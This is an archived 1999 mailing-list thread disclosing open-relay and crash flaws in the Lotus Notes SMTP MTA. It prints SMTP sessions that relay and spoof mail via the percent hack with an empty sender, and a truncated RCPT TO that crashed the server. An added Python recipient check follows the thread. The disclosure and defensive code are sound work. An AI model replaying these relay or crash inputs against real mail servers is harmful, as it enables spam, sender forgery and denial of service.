`Date: Mon, 14 Jun 1999 17:40:35 +0100
From: Robert Lister <[email protected]>
To: [email protected]
Subject: Lotus Notes Relay

Following postings about NTMail having open relaying ability, (in certain
situations) I have identified a problem with the Lotus SMTP MTA (right up
to v4.6.4, have yet to test Domino 5)

Basically, it's possible to relay (and even appear to "forge" a message)
using a combination of the percent hack and the blank from address,
and this is *despite* having changed the notes.ini with the settings
for anti-relaying:

telnet server 25
Connected to 192.168.100.1.
Escape character is '^]'.
220 company.com Lotus SMTP MTA Service Ready
HELO some.domain
250 company.com
MAIL FROM:<>
250 OK
RCPT TO:<recipient%[email protected]>
250 OK
DATA
>From: ... etc
whaterver you like..
.
250 Message received OK.
quit
221 GoodBye

The bad bit of this is that notes seems to strip out previous headers
(depending on how it's configured) and add new outgoing notes headers,
and it even goes as far as doing things like expanding cc:headers and
permitting sending to notes mailing lists, etc, making it look like
mail originated from the notes domain itself.

It also takes whatever I put in the "From: " header and presents
this in its outgoing "MAIL FROM:<>"

I have contacted Lotus support and they have confirmed that this
is an issue and are looking in to it. Can't wait to get testing
on version 5!!

I have also pointed out to them that the lotus SMTP MTA seems
to accept any mail for any domain, and then, only having accepted
it, make a decision as to what to do with it. If it decides that it
cannot relay it, it generates a message back to the "sender" that
"this server will not relay" however, 9 times out of 10, the remote
domain won't exist, so this message will fail. - as opposed to
responding with, say, 5xx relaying not permitted before accepting
the message. - Possibly not the best use of the protocol!

Regards,
Rob
([email protected])
--------------------------------------------------------------------------------
Date: Wed, 16 Jun 1999 08:52:28 +1000
From: Mark Laffan <[email protected]>
To: [email protected]
Subject: Re: Lotus Notes Relay

This will work UNLESS the two below notes.ini settings are set.

smtpmta_allow_known_domains=1
smtp_och_reject_smtp_originated_messages=1

Connected to 192.168.100.1.
Escape character is '^]'.
220 company.com Lotus SMTP MTA Service Ready
HELO some.company
250 company.com
MAIL FROM:<>
250 OK
RCPT TO:<recipient%[email protected]>
501 This MTA is configured NOT to relay message from [some.server.com] to
[company.com.com].
quit
221 GoodBye

This is a new SMTPMTA setting from R4.6.4 onward.

Cheers
Mark
--------------------------------------------------------------------------------
Date: Wed, 16 Jun 1999 10:06:18 +0100
From: Robert Lister <[email protected]>
To: [email protected]
Subject: Re: Lotus Notes Relay

On Wed, Jun 16, 1999 at 08:52:28AM +1000, Mark Laffan wrote:
> This will work UNLESS the two below notes.ini settings are set.
>
> smtpmta_allow_known_domains=1
> smtp_och_reject_smtp_originated_messages=1
>
> Connected to 192.168.100.1.
> Escape character is '^]'.
> 220 company.com Lotus SMTP MTA Service Ready
> HELO some.company
> 250 company.com
> MAIL FROM:<>
> 250 OK
> RCPT TO:<recipient%[email protected]>
> 501 This MTA is configured NOT to relay message from [some.server.com] to
> [company.com.com].
> quit
> 221 GoodBye
>
> This is a new SMTPMTA setting from R4.6.4 onward.
>
> Cheers
> Mark
>

Interesting that one. It seems to be more secure in that it sends 501 back
for anything it doesn't like, but our server still permits me to relay
using the mentioned percent hack, IF the domain after the @ sign is the
same as the server's domain name.

PS: lotus didn't seem to know about this one, so I'll let
the guy I was speaking to at lotus know.

Interesting possible DOS attack on my server:
- will do a little more research (but I'll have to put together
a test server, my notes guy is getting irritated rebooting the
live server that I picked on to do this, since I did this quite
by accident!)

Trying 192.168.100.10...
Connected to 192.168.100.10.
Escape character is '^]'.
220 company.com Lotus SMTP MTA Service Ready
HELO lart
250 company.com
MAIL FROM:<[email protected]>
250 OK
RCPT TO:<[email protected]>
501 This MTA is configured NOT to relay message from [xxxxx] to [bogus.org].
RCPT TO:<robl%
[server dead]

Server console has an error on it:

Application Error Notification:
niseshlr.exe
Crash information will be saved in the NOTES.RIP file.

Ooooops!

Rob
`
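
An added example, not part of the original posts and not Lotus code: a recipient check made at RCPT TO time that covers the three behaviours raised in the thread (a percent-hack address under the server's own domain, refusing with 5xx before DATA instead of accepting and bouncing, and a truncated command). The `company.com` local domain follows the banner in the transcripts; the function names, reply texts and sample addresses are constructed for illustration.

```python
import re

# Assumption: the domains this MTA is final destination for ("company.com"
# follows the banner in the transcripts above).
LOCAL_DOMAINS = {"company.com"}

_RCPT = re.compile(r"RCPT TO:<([^<>\s]*)>", re.IGNORECASE)
# Local part limited to characters with no routing meaning: no %, !, @ or :
_LOCAL = re.compile(r"[A-Za-z0-9._+=-]+")
_DOMAIN = re.compile(r"[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def check_rcpt(line, local_domains=LOCAL_DOMAINS):
    """Return the (code, text) reply for one RCPT TO command line."""
    m = _RCPT.fullmatch(line.strip())
    if not m:
        # Truncated or malformed command: answer it, never pass it on.
        return 501, "Syntax error in RCPT TO"
    local, at, domain = m.group(1).rpartition("@")
    if not at or not local or not _DOMAIN.fullmatch(domain):
        return 501, "Syntax error in address"
    if domain.lower() not in local_domains:
        # Refuse before DATA, so no bounce is ever owed to a forged sender.
        return 550, "Relaying not permitted"
    if not _LOCAL.fullmatch(local):
        # user%remote@local names a further hop even though the domain is ours.
        return 550, "Source-routed recipient not accepted"
    return 250, "OK"


# Constructed sample commands (not captured traffic).
SAMPLE = [
    "RCPT TO:<robl@company.com>",
    "RCPT TO:<recipient%remote.example@company.com>",
    "RCPT TO:<someone@bogus.org>",
    "RCPT TO:<robl%",
]


def replay(lines):
    """Reply code for each command, in order."""
    return [check_rcpt(line)[0] for line in lines]


if __name__ == "__main__":
    for cmd in SAMPLE:
        print(cmd, "->", *check_rcpt(cmd))
```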